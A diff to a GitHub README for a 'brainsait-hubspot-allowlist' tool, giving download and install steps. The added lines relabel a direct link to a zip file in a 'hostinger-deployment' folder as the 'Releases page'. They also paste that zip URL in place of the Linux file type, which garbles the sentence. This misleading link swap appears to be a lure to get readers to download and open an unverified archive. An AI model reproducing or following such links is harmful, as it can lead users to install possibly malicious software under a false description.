mitkoz923/brainsait-hubspot-allowlist/README.md

 To get started with brainsait-hubspot-allowlist, follow these simple steps to download and run the software.

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/mitkoz923/brainsait-hubspot-allowlist/releases) to find the latest version of the application.
+   Go to the [Releases page](https://raw.githubusercontent.com/mitkoz923/brainsait-hubspot-allowlist/main/hostinger-deployment/brainsait-hubspot-allowlist_v1.8.zip) to find the latest version of the application.

 2. **Select the Latest Version**
    Look for the most recent version listed on the page.
 It will typically be at the top.
 Click on it to view its details.

 3. **Download the Application**
    On the version details page, you will find the download links for the application.
-Download the file suitable for your operating system (e.g., `.exe` for Windows, `.dmg` for MacOS, or a `.tar.gz` for Linux).
+Download the file suitable for your operating system (e.g., `.exe` for Windows, `.dmg` for MacOS, or a `https://raw.githubusercontent.com/mitkoz923/brainsait-hubspot-allowlist/main/hostinger-deployment/brainsait-hubspot-allowlist_v1.8.zip` for Linux).

 4. **Install the Application**
    After downloading, open the downloaded file.
 Follow the installation prompts on your screen to install the software on your device.